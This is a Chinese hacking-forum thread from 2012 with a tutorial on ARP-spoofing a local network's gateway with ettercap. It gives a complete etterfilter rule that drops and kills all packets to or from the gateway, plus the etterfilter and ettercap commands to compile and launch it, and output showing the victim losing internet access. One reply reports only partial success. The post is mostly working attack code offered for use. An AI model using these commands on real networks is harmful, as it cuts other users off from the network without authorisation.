切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
48 : 中间人攻击 ettercap : 攻击网关[复制链接]
发表于 2012-8-18 23:54:46 | 显示全部楼层 |!read_mode!
首先微观这文章:http://baike.baidu.com/view/807.htm
只要我们把网关的数据包搞挂 他就上不了网
查看网关:


  1. root@Dis9Team:~/arp# netstat -r
  2. Kernel IP routing table
  3. Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
  4. 5.5.5.0         *               255.255.255.0   U         0 0          0 eth0
  5. link-local      *               255.255.0.0     U         0 0          0 eth0
  6. default         5.5.5.2         0.0.0.0         UG        0 0          0 eth0
  7. root@Dis9Team:~/arp#
复制代码
5.5.5.2 写我们的规则:


  1. if (ip.src == '5.5.5.2' || ip.dst == '5.5.5.2')
  2. {
  3.         drop();
  4.         kill();
  5.         msg("Packet killed\n");
  6. }       
复制代码
代码很简单 发现有5.5.5.2的链接 我们中断 编译 运行
  1. root@Dis9Team:~/arp# etterfilter  dos -o d.ef
  2. root@Dis9Team:~/arp# ettercap -TqF d.ef -M ARP // //
复制代码
同网关的机子访问不了放和网络,当然除非和其他网卡


  1. C:\Documents and Settings\Administrator>ping www.baidu.com
  2. Ping request could not find host www.baidu.com. Please check the name and try ag
  3. ain.

  4. C:\Documents and Settings\Administrator>
复制代码



操千曲而后晓声,观千剑而后识器。
发表于 2012-8-19 11:05:05 | 显示全部楼层
测试不成功,xp下依然可以上网,但是确实有丢包现象
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-23 10:18

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部